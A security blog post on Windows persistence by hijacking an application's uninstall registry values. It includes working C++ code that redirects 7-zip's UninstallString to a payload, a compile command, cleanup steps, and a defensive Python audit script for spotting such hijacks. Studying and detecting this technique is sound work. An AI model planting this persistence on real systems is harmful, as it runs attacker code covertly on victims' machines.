
Hello, cybersecurity enthusiasts and white hackers!


This post is the result of my own research into one of the more interesting malware persistence tricks: hijacking the uninstall command of a target application.

uninstallation process

When you install a program on a Windows system, it usually registers its own uninstaller. The uninstall commands are stored in the registry keys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<application name>


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\QuietUninstallString\<application name>

So what is the trick? Nothing prevents these values from being replaced with a command that runs any other program. When a user executes the uninstaller, the command of the attacker's choosing is executed instead. The good news is that elevated privileges are required to modify these values, since they reside under the HKLM hive.
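As a defensive counterpart to the trick described above, here is an added example (my own audit script, not part of the original post) that parses the text output of reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall /s and flags every UninstallString or QuietUninstallString whose executable lives in a user-writable directory or outside the application's InstallLocation. The registry dump embedded in the script is constructed: the 7-zip entry is hijacked the way the post describes, and the ExampleApp key is a placeholder for an untouched application.

```python
"""Audit Uninstall registry entries for hijacked uninstall commands (added example)."""
import ntpath
import re
import sys
from typing import Dict, List, NamedTuple

UNINSTALL_VALUES = ("UninstallString", "QuietUninstallString")
# Directory fragments that an unprivileged user can normally write to.
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\programdata\\")

# Constructed sample of `reg query ... /s` output: the 7-zip entry is hijacked,
# ExampleApp is a placeholder for an untouched application.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip
    DisplayName    REG_SZ    7-Zip 22.01 (x64)
    InstallLocation    REG_SZ    C:\Program Files\7-Zip\
    UninstallString    REG_SZ    C:\Users\User\Documents\malware\2022-10-04-malware-pers-13\hack.exe
    QuietUninstallString    REG_SZ    C:\Users\User\Documents\malware\2022-10-04-malware-pers-13\hack.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ExampleApp
    DisplayName    REG_SZ    Example App
    InstallLocation    REG_SZ    C:\Program Files\ExampleApp
    UninstallString    REG_SZ    "C:\Program Files\ExampleApp\uninstall.exe" /S
"""


class Finding(NamedTuple):
    key: str
    value: str
    executable: str
    reason: str


def parse_reg_query(text: str) -> Dict[str, Dict[str, str]]:
    """Turn `reg query ... /s` text into {key_path: {value_name: data}}."""
    entries: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("HKEY_"):          # a new subkey starts at column 0
            current = raw.strip()
            entries[current] = {}
            continue
        if current is None:
            continue
        # value lines look like: "    Name    REG_TYPE    data"
        parts = re.split(r"\s{2,}", raw.strip(), maxsplit=2)
        if len(parts) >= 2 and parts[1].startswith("REG_"):
            entries[current][parts[0]] = parts[2] if len(parts) == 3 else ""
    return entries


def extract_executable(command: str) -> str:
    """Return the program part of an uninstall command line (quoted or not)."""
    command = command.strip()
    m = re.match(r'"([^"]+)"', command)
    if m:
        return m.group(1)
    m = re.match(r"(.*?\.exe)(?=\s|$)", command, re.IGNORECASE)
    if m:
        return m.group(1)
    return command.split()[0] if command else ""


def _normalize(path: str) -> str:
    # ntpath works on any platform, so the audit can run off-host on a dump
    return ntpath.normcase(ntpath.normpath(path))


def _under(path: str, directory: str) -> bool:
    return _normalize(path).startswith(_normalize(directory).rstrip("\\") + "\\")


def audit(entries: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Flag uninstall values pointing outside the app's own install directory."""
    findings: List[Finding] = []
    for key, values in entries.items():
        install_dir = values.get("InstallLocation", "").strip().strip('"')
        for name in UNINSTALL_VALUES:
            if name not in values:
                continue
            exe = extract_executable(values[name])
            reasons = []
            if any(marker in _normalize(exe) for marker in USER_WRITABLE_MARKERS):
                reasons.append("executable lives in a user-writable directory")
            # A bare program name (MsiExec.exe, rundll32.exe) is resolved via
            # PATH, so the InstallLocation comparison does not apply to it.
            if install_dir and "\\" in exe and not _under(exe, install_dir):
                reasons.append("executable is outside InstallLocation " + install_dir)
            if reasons:
                findings.append(Finding(key, name, exe, "; ".join(reasons)))
    return findings


def main(argv: List[str]) -> None:
    # pass "-" to read a real `reg query ... /s` dump from stdin
    text = sys.stdin.read() if argv[1:] == ["-"] else SAMPLE_REG_OUTPUT
    for f in audit(parse_reg_query(text)):
        print(f"{f.key}\n  {f.value} -> {f.executable}\n  {f.reason}")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as is to see the constructed 7-zip hit, or pipe a saved reg query dump from a real host into it with "-". The InstallLocation check catches the hijack even when the attacker stages the payload somewhere outside the usual user directories, which is why both rules are applied.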

practical example

Let’s look at a practical example. Firstly, let’s choose a target application. I chose 7-zip x64:




Then, check the registry key values for correctness:

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /s


Also, I prepared my evil application. As usual, it's the meow-meow "malware" :)


Then, I create a program which does my persistence logic (pers.cpp):

/*
 * windows persistence via
 * hijacking uninstall app
 * author: @cocomelonc
 */
#include <windows.h>
#include <string.h>

int main(int argc, char* argv[]) {
  HKEY hkey = NULL;

  // target app
  const char* app = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\7-zip";

  // evil app
  const char* exe = "C:\\Users\\User\\Documents\\malware\\2022-10-04-malware-pers-13\\hack.exe";

  // open the target app's uninstall key for writing (lives under HKLM, so this needs admin)
  LONG res = RegOpenKeyEx(HKEY_LOCAL_MACHINE, (LPCSTR)app, 0, KEY_WRITE, &hkey);
  if (res == ERROR_SUCCESS) {
    // update registry key values, equivalent to:
    // reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "...\hack.exe" /f
    // cbData for a REG_SZ must include the terminating null, hence strlen(exe) + 1
    RegSetValueEx(hkey, (LPCSTR)"UninstallString", 0, REG_SZ, (const BYTE*)exe, strlen(exe) + 1);
    RegSetValueEx(hkey, (LPCSTR)"QuietUninstallString", 0, REG_SZ, (const BYTE*)exe, strlen(exe) + 1);
    RegCloseKey(hkey);
  }

  return 0;
}

As you can see, the logic is simple: we just update the target key values in the registry.


Let's see everything in action. Compile the malware and the persistence program:

x86_64-w64-mingw32-g++ -O2 pers.cpp -o pers.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive


And run it on the victim's machine, Windows 10 x64 in my case:



Finally, after rebooting my system, I tried to uninstall 7-zip:





Then I looked at the properties of hack.exe in Process Hacker 2:


As you can see, the parent process is SystemSettings.exe, which is what you see whenever you open your Windows settings. In our case, it is Add/Remove Programs. Perfect! =^..^=

There is one little caveat. When I tried to update the key with the path Z:\2022-10-04-malware-pers-13\hack.exe, I got an error like this:


Perhaps only paths on the C:\ drive can be used.

After finishing the experiments, clean up:

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\7-zip" /v "UninstallString" /t REG_SZ /d "C:\Program Files\7-zip\Uninstall.exe" /f



Of course, maybe this trick is not so cool for persistence, since it requires permissions and the participation of the victim's user. But why not?

There is one more trick that uses installing and removing programs for persistence; I will write about it in one of the future posts. I'm still investigating this possibility for the red team.

I hope this post spreads awareness of this interesting technique to the blue teamers, and adds a weapon to the red teamers' arsenal.

reg query
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine